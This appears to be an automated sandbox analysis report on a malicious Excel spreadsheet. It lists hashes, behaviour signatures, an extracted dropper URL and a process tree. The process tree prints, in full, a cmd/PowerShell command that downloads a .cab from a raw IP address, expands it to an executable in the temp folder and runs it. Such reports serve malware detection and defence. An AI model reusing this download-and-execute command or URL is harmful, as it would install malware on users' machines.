Analysis

  • max time kernel
    106s
  • max time network
    58s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    28-11-2022 16:47

General

  • Target

    4ad7ed1ab9734ce40601e2283c3f1bb00607770c517901c322a33c41894ce720.xls

  • Size

    56KB

  • MD5

    778ab8b6d5aace23a82e116bca639763

  • SHA1

    eae5003689ac0e66da255f20da282801f9d68037

  • SHA256

    4ad7ed1ab9734ce40601e2283c3f1bb00607770c517901c322a33c41894ce720

  • SHA512

    e323c04bc61c2d828d0c049bc570bd0139d5ef63732be4f1f999917b934ff43c10f2cde05c423193549572f9485306ae6df049bb04e1ed748d85cbb9e60bddee

  • SSDEEP

    384:Qt+LbB5ou8rEKKdlTmmyX2hWdO+sXy/lNcVySuur9m8jfxYkLZ:6+LbXoJEKlmqM+ZEyEQmxLLZ

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://185.48.56.137/ssdynamooss/sspidarss.cab

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4ad7ed1ab9734ce40601e2283c3f1bb00607770c517901c322a33c41894ce720.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Windows\SysWOW64\cmd.exe
      cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','C:\Users\Admin\AppData\Local\Temp\FgdgFFFgfgF.cab'); expand C:\Users\Admin\AppData\Local\Temp\FgdgFFFgfgF.cab C:\Users\Admin\AppData\Local\Temp\FgdgFFFgfgF.exe; start C:\Users\Admin\AppData\Local\Temp\FgdgFFFgfgF.exe;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\SysWOW64\expand.exe
          "C:\Windows\system32\expand.exe" C:\Users\Admin\AppData\Local\Temp\FgdgFFFgfgF.cab C:\Users\Admin\AppData\Local\Temp\FgdgFFFgfgF.exe
          4⤵
            PID:836

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/524-64-0x000000006C820000-0x000000006CDCB000-memory.dmp
      Filesize

      5.7MB

    • memory/524-60-0x0000000000000000-mapping.dmp
    • memory/524-66-0x000000006C820000-0x000000006CDCB000-memory.dmp
      Filesize

      5.7MB

    • memory/524-62-0x000000006C820000-0x000000006CDCB000-memory.dmp
      Filesize

      5.7MB

    • memory/836-65-0x0000000000000000-mapping.dmp
    • memory/968-58-0x000000007298D000-0x0000000072998000-memory.dmp
      Filesize

      44KB

    • memory/968-55-0x00000000719A1000-0x00000000719A3000-memory.dmp
      Filesize

      8KB

    • memory/968-57-0x0000000075831000-0x0000000075833000-memory.dmp
      Filesize

      8KB

    • memory/968-54-0x000000002F241000-0x000000002F244000-memory.dmp
      Filesize

      12KB

    • memory/968-63-0x000000007298D000-0x0000000072998000-memory.dmp
      Filesize

      44KB

    • memory/968-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/968-67-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/968-68-0x000000007298D000-0x0000000072998000-memory.dmp
      Filesize

      44KB

    • memory/1796-59-0x0000000000000000-mapping.dmp